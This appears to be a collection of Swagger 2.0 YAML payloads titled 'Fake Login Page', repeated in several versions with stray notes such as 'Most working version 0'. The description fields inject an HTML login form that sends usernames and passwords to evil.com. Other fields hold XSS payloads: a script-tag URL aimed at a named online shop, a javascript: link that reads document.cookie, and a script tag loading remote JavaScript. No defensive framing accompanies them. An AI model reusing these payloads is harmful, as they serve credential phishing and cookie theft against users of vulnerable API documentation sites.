swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <div class="form-container">
      <form action="https://evil.com" method="get" class="form-signin">
        <div class="form-group">
          <label for="username">Username</label>
          <input type="text" name="username" size="20">
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input type="password" name="password" size="20">
        </div>
        <div class="form-group">
          <button type="submit" class="btn btn-default">Login</button>
        </div>
      </form>
    </div>
  termsOfService:  |
            https://bonanzasatrangi.com/collections/unstitched/%3Cscript%20src=data:text/html,alert(document.cookie)%3E%3C/script%3E
  contact: 
    name: "API Support"
    url: "https://attacker.com/"
    email: "bilalabbasuk@gmail.com"
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful


















































Most working  version 0

swagger: '2.0'
info:










  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">'
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support"
    url: "https://evil.com/"
    email: "bilalabbasuk@gmail.com"

From <https://raw.githubusercontent.com/bilauk/checkSWG/main/hex.yaml> 

Version1
swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    </div>
    <div class="form-container">
      <form action="https:evil.com" method="post" class="form-signin">
        <div class="form-group">
          <label for="username">Username</label>
          <input type="text" name="username" size="20">
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input type="password" name="password" size="20">
        </div>
        <div class="form-group">
          <button type="submit" class="btn btn-default">Login</button>
        </div>
      </form>
    </div>
    </div>'
  termsOfService: '<div class="login-form"><script src="https://static.staticsave.com/blunder/futaq.js"></script></div>'
  contact: 
    name: "API Support"
    url: "https://evil.com"
    email: "bilalabbasuk@gmail.com"
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful

From <https://raw.githubusercontent.com/bilauk/checkSWG/main/hex.yaml> 

swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <div class="form-container">
      <form action="https://evil.com" method="get" class="form-signin">
        <div class="form-group">
          <label for="username">Username</label>
          <input type="text" name="username" size="20">
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input type="password" name="password" size="20">
        </div>
        <div class="form-group">
          <button type="submit" class="btn btn-default">Login</button>
        </div>
      </form>
    </div>
  termsOfService:  |
            https://bonanzasatrangi.com/collections/unstitched/%3Cscript%20src=data:text/html,alert(document.cookie)%3E%3C/script%3E
  contact: 
    name: "API Support"
    url: "https://attacker.com/"
    email: "bilalabbasuk@gmail.com"
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful







  
